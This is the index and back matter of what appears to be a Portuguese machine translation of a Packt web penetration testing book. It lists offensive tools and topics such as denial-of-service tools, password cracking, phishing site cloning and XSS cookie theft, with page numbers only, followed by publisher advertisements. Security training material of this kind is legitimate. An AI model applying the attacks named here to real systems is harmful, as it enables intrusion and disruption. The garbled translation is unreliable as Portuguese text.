linhas de base 279
diretrizes 279
padres 279
padres da indstria
cerca de 279, 280
Fase Coleta de Informaes 282
Coleta de informaes 17, 30, 34
instalao
Kali Linux 22-27
Kali Linux, requisitos 22
Organizao Internacional para Normalizao-
o (ISO) 253, 287
Intrusion Detection / Prevention
(IDS / IPS) 305
Inundator 248
Iptables
utilizado, para a criao de porto
redirecionamento 124-126
[316]
eporting Ferramentas 31
Engenharia reversa 30
Cheirando e Spoofing 30
Teste de Stress 31
Servios do Sistema 31
Anlise de Vulnerabilidade 30
Aplicaes Web 30
Os ataques sem fio 30
KeepNote 301
N
Instituto Nacional de Padres e Tecnologia-
logia (NIST) 280
Opo NAT 135
Nessus
cdigo de ativao, URL 145
transferncia, para o Debian 145
sediar a digitalizao 145
instalao, em Kali 145, 146
usando 146-150
Nessus HomeFeed 145
ProfessionalFeed Nessus 145
Netcat 106, 107
Network Mapper. Ver NMap
servidores de rede 73
guia topologia da rede, NMap 63
Intrusion Prevention Next Generation
Sistemas (NGIPS) 216
NMap
cerca de 59, 62
Hosts tab 64
guia de topologia de rede 63
novo perfil, criando 61
Novo perfil ou de comando, selecionando 61
Guia Ping 63
Boto Salvar alteraes 63
janela de digitalizao 65
URL 59
utilizando 59
Zenmap 65, 66
Zenmap, a abertura 60
North American Electric Reliability
Corporation (NERC) 280
L
Linux senhas 155
guia log, ProxyStrike 84
Janela Log, w3af 104
LOIC
cerca de 242
instalao de 243
o lanamento de 244
utilizando 244
Low Orbit Ion Cannon. Ver LOIC
M
MagicTree 301
Manter Foothold
cerca de 20
golos 20
Ferramentas de acesso Manter 20, 30
Maltego
cerca de 57
comeando 57
utilizando 58
Maltego caseFile 301
man-in-the-middle
cerca de 121
defesa 259, 260
man-in-the-middle ataque 193
Mdia de Segurana Controle de Acesso
(MACsec) 261
Metasploit
cerca de 96-102
URL 98
meterpreter 132
MITM. Ver man-in-the-middle
MITM Proxy 143, 144
MLA 277
O
Ophcrack 165-167
OTP (one-time passwords) 261
OWASP-Zap
cerca de 89
Alertas tab 92
Certificate Authority 90
Gerar 90
89 boto Gerar
Relatrio HTML 94
mercado 94
[317]
Guia Relatrio 94
Sites janela 91
P
Pasco 275
Ataques senha
cerca de 30
ferramentas 20
ferramentas de quebra de senha, Kali
cerca de 155
chntpw 161-164
Crunch 168, 169
hashcat 159
Johnny 156, 158
oclHashcat 159
Ophcrack 165, 166, 167
samdump2 161
senhas
cerca de 119
rachaduras 151
rachaduras, por hackers 152
Linux senhas 155
polticas 256, 257
Senhas do Windows 153
Patator 210
gerenciamento de patches 254, 255
consertar este sistema 292
Guia Generator Payload, WebSlayer 114
Stand-aplicativo de pagamento Segurana de Dados
ard (PA-DSS) 280
Payment Card Industry Data Security
Padro (PCI DSS) 253, 280
pdf-parser 275
Penetrao Teste Relatrio Executivo 277, 278
Teste de Invaso
cerca de 7, 8, 16
Teste de caixa preta 9
Teste de caixa cinza 10
aplicao web 8, 9
Teste de caixa branca 9, 10
trabalho, alcance 11
A verificao de identidade pessoal (PIV) 176
phrasendrescher 173
Physical Address Extension (PAE) 21
comando ping 52
Guia Ping, NMap 63
plugins guia, ProxyStrike 84
Opo de encaminhamento porta 135
redirecionamento de porta
configurando, Iptables usado 124-126
escalao de privilgios
cerca de 19
golos 20
servios profissionais 280, 281
Reviso do Projeto 282
ataques de protocolo 236
seo proxy, Vega 88
ProxyStrike
cerca de 81, 82
guia rastreador 84
guia 84 log
plugins tab 84
URL 84
utilizando 82
guia proxy, Vega 86
R
RainbowCrack 152
RainbowCrack (rcracki_mt) 172
tabelas do arco-ris 152
Atacantes reais 11
Reconhecimento
cerca de 17, 18, 33
site da empresa 35
Reconnaissance DNS, tcnicas de 53, 55
Identificao do alvo DNS 55, 57
Eletrnico coleta de dados, anlise e
Retrieval (EDGAR) 40
FOCA 66-72
Google Hacking 44, 45
Google Hacking banco de dados (GHDB) 45-48
HTTrack 49-52
ICMP Reconnaissance, tcnicas de 52, 53
trabalho, postagens 41
localizao 42
Maltego 57, 58
redes, pesquisando 48, 49
Nmap 59-62
objetivos 34
Registros Regionais da Internet (RIRs) 39
pesquisa 34
Shodan 42
[318]
mdia social, recursos 41
confiana 41
histrico da web, fontes de 36-38
Registros Regionais de Internet. Ver RIRs
relatrio
documentao 282
relatrio executivo 285, 286
formato 282
Boto Report, DirBuster 113
relatrio, o formato
apndices 294
declarao de confidencialidade 283
folha de rosto 283
documento, controle de 284
sumrio executivo 285, 286
resultados, resumo 289
glossrio 294
metodologia 286, 287
rede, consideraes 292, 293
rede, recomendaes 292, 293
procedimentos de teste, detalhado 288
cronograma 284
vulnerabilidades 290, 292
Reporting Tools 31
ferramentas de relatrios, Kali Linux
CutyCapt 302
Dradis 300
KeepNote 301
MagicTree 301
Maltego caseFile 301
amostra relata 302-310
Guia Relatrio, OWASP-Zap 94
Os pedidos de Preos (RFP)
cerca de 281
Guia Resultados, w3af 104
Engenharia reversa 30
Fase de reviso 282
RIRs 39
Arquivo robots.txt 35
S
salga 152
samdump2 161
SAM (Account Management System) regis-
tentar arquivo 153
Lei Sarbanes-Oxley (SOX) 280
Boto Salvar alteraes 63
Sistema SCADA 42
Scalpel 276
guia scanner, Vega 86
Scapy
cerca de 238
ataque, cenrios 238-240
Secure Socket Layer (SSL) 236
auditoria de segurana 13
Guia de Segurana Tcnico de Implementao.
Ver STIG
Sensvel Informaes Compartmented
Facility (SCIF) 283
servidor 73
ataques do lado do servidor 74
servios comandar 98
exausto sesso 236
gerenciamento de sesses
cerca de 177
SET
cerca de 130, 131, 230, 231
falso e-mail, o envio de 141, 142
meterpreter 139
a criao de 131, 132
Cloner site 140
modelo, a seleo de 232
nome de utilizador, inserindo 233
utilizando, para atacar 132-134
utilizando, para clonar 132-134
Definir senha colheita. Ver SET
Shodan 42
Sidejacking 190
Siege 247
Expectativa de perda nica. Ver SLE
Cloner site 140
Janela Sites, OWASP-Zap 91
Skipfish
cerca de 78, 80
opes de comando 78
verso mais recente, o download de 78
SLE 15
SlowLoris
cerca de 241
execuo 241
URL para download de 241
Cheirando e Spoofing 30
SniffJoke 246
[319]
engenharia social 129, 130
Ataques de engenharia social 134
Sociais Toolkit Engenharia. Ver SET
mdias sociais
cerca de 41
SOW
cerca de 284, 295
relatrio de actividade 296
do lado do cliente Penetrao Relatrio de teste 296
relatrio executivo 295
relatrio executivo, exemplo 295
sediar reportar 296
o material 298, 299
testes de penetrao, externo 296, 297
relatrio de um utilizador 296
relatrio vulnerabilidade 296
SQL
cerca de 200, 201
injeo de 202, 203
SqlMap 203, 204
SqlMap 203, 204
Tira SSL 122, 123
Defesa tira SSL 261, 262
Declarao de Trabalho. Ver SOW
STIG 254
Teste de Stress 31
Resumo dos resultados 289
Servios do Sistema 31
dictstat 171, 172
findmyhash 173
Hash-identificador 170
phrasendrescher 173
RainbowCrack (rcracki_mt) 172
comando traceroute 52
TrustedSec. 130
Servios Turnkey 280
U
Unicast Inverter caminho Forwarding (Unicast
RPF) 263
Atualize a opo Toolkit social-Engenheiro
134
urlsnarf
cerca de 208
acessando 208
utilizando 208
relatrio de um utilizador 296
V
Vega
cerca de 85, 86
Mdulos de injeo 86
Seo Proxy 88
guia Proxy 86
Mdulos de processamento de resposta 86
guia do scanner 86
Site View janela 87
Virtual Private Network (VPN) 261
Imagem VM
e Kali Linux 29
de volume baseado ataques 236
vulnerabilidades 290, 292
Anlise de Vulnerabilidade 18, 30
Avaliao de Vulnerabilidade 13 16
relatrio vulnerabilidade 296
T
Tamper Data 108-110
Alvo de Avaliao 18
TCPReplay 248
prova
procedimentos 288
THC 107
THC-SSL-DOS 236, 237
Escolha do Hacker. Ver THC
A Associao de Lnguas Modernas da
Estilo Amrica. Ver MLA
Time and Materials 281
Prazo do trabalho realizado 11
cronogramas 284
ferramentas, Kali
CmosPwd 173
creddump 174
W
w3af
cerca de 102-105
Guia 104 Exploit
Entrar janela 104
Guia Resultados 104
w3mir 259
[320]
Wayback Machine
acessando 36
aplicao web 8, 9, 30
Aplicaes Web Attack e Auditoria
Quadro. Ver w3af
WebCopier 259
Web Developer 180
Cookies de sesso web. Ver bolinhos
Webshag
cerca de 74-77
URL 77
webshag-gui 74
Vetores de Ataque Site 134
WebSlayer
cerca de 113-118
Guia Configurao de Ataque 114
Guia Generator Payload 114
Websploit
cerca de 95
acessando 95
Teste de caixa branca 9, 10
Windows
montagem 154
O Windows Reverse_TCP Meterpreter 136
Ataques sem fio 30
Wireshark
cerca de 187
localizao 188
trfego, capturando 188, 189
bolinho inseguro, capturando 190
Wireshark Biscoito Dump 182
comando contagem de palavras 120
X
XSS
cerca de 204
cookie de roubar 206, 207
teste 205, 206
Z
ZAP
cerca de 225, 226
Arquivos SEED 228, 229
criao, com o Firefox 226, 227
Zaproxy. Ver OWASP-Zap
Zenmap 65
abertura 60
[321]
Teste de Invaso Web com Kali Linux
Sobre Packt Publishing
Packt, pronuncia-se 'embalado', publicou o seu primeiro livro "Mastering phpMyAdmin para Aumentar a Eficcia
Gesto MySQL " em abril de 2004 e, posteriormente, continuou a especializar-se em publicao
livros altamente focada em tecnologias e solues especficas.
Nossos livros e publicaes compartilhar as experincias de seus colegas profissionais de TI na adaptao
e personalizao de sistemas de hoje, aplicaes e frameworks. Nossa soluo livros baseados
dar-lhe o conhecimento e poder de personalizar o software e tecnologias que voc est usando
para comear o trabalho feito. Packt livros so mais especficos e menos geral do que os livros de TI que voc tem
visto no passado. Nosso modelo de negcios nico que nos permite trazer-lhe informaes mais focado,
dando-lhe mais do que voc precisa saber, e menos do que voc no faz.
Packt uma editora ainda originais modernas, que se concentra na produo de qualidade,
livros de ponta para as comunidades de desenvolvedores, administradores e tambm de novatos. Para
obter mais informaes, visite o nosso website: www.packtpub.com.
Obrigado por comprar
Sobre Packt Open Source
Em 2010, Packt lanou duas novas marcas, Packt Open Source e Packt da empresa, a fim de
continuar seu foco na especializao. Este livro faz parte da marca Packt Open Source, casa
de livros publicados sobre software construdo em torno de licenas de cdigo aberto, e que oferecem informaes
a qualquer um dos desenvolvedores avanados para iniciantes de web designers. A marca Open Source
tambm corre Open Source Royalty Esquema de Packt, pelo qual Packt d um royalty para cada Abrir
Projeto Fonte sobre cujo software um livro vendido.
Escrevendo para Packt
Congratulamo-nos com todas as perguntas de pessoas que esto interessadas em criao. Propostas Livro
devem ser enviadas para author@packtpub.com. Se a sua idia do livro ainda est numa fase inicial e voc
gostaria de discuti-lo primeiro antes de escrever uma proposta formal do livro, entre em contato conosco; um dos
nossos
editores de comissionamento ir entrar em contato com voc.
Ns no estamos apenas procura de autores publicados, se voc tem fortes habilidades tcnicas, mas nenhuma
escrita
experincia, os nossos editores experientes podem ajud-lo a desenvolver uma carreira de escritor, ou simplesmente
obter alguma
recompensa adicional para a sua especializao.
BackTrack - Teste sem fio
Segurana de Rede
ISBN: 978-1-78216-406-7 Paperback: 108 pginas
Proteja a sua rede wireless contra ataques, cortes,
e intrusos com este guia passo-a-passo
1.
2.
3.
Faa suas redes sem fio prova de balas
Facilmente proteger a sua rede de intrusos
Veja como os hackers faz-lo e aprender a
defender-se
BackTrack 5 Cookbook
ISBN: 978-1-84951-738-6 Paperback: 296 pginas
Mais de 80 receitas para executar muitas das mais conhecidas
e pequenos aspectos peneration de testes conhecidos de
BackTrack 5
1.
2.
Aprenda a realizar testes de penetrao com
BackTrack 5
Cerca de 100 receitas projetadas para ensinar
princpios de teste de penetrao e de construo
conhecimento do BackTrack 5 Ferramentas
Fornece instrues passo-a-passo sobre
o uso de muitos dos BackTrack do popular e
ferramentas no to populares
3.
Por favor, verifique www.PacktPub.com para obter informaes sobre nossos
ttulos
[324]
BackTrack 5 Penetrao sem fio
Guia do Testing Beginner
ISBN: 978-1-84951-558-0 Paperback: 220 pginas
Mestre borda do sangramento tcnicas de teste com witeless
BackTrack 5
1.
2.
3.
4.
Saiba Teste de Invaso sem fio com o
verso mais recente do Backtrack
O primeiro e nico livro que aborda sem fio
testes com BackTrack
Conceitos explicados com o passo-a-passo prtico
sesses e ilustraes ricas
Escrito por Vivek Ramachandran - mundo
pesquisa de segurana de renome e evangelista, e
descobridor do wireless "Caffe Latte Attack"
Metasploit Teste de Invaso
Livro de receitas
ISBN: 978-1-84951-742-3
Mais de 70 receitas para dominar o mais utilizado
framework de testes de penetrao
1.
Paperback: 268 pginas
Mais de 80 receitas / practicaltasks que vai
aumentar o conhecimento do leitor a partir de iniciante
a um nvel avanado
Foco especial sobre os mais recentes sistemas operacionais,
exploits, e tcnicas de teste de penetrao
A anlise detalhada de ferramentas de terceiros com base
na estrutura Metasploit para melhorar o
experincia em testes de penetrao
2.
3.
Por favor, verifique www.PacktPub.com para obter informaes sobre nossos
ttulos
[325]

Obrigado
Quer mais
Livros?
Ns esperamos que voc aprendeu o que voc esperava de aprender
com
este e-book. Encontrar tais livros mais teis sobre
www.PlentyofeBooks.net
Saiba mais e fazer seus pais orgulhosos :)
Saudaes
www.PlentyofeBooks.net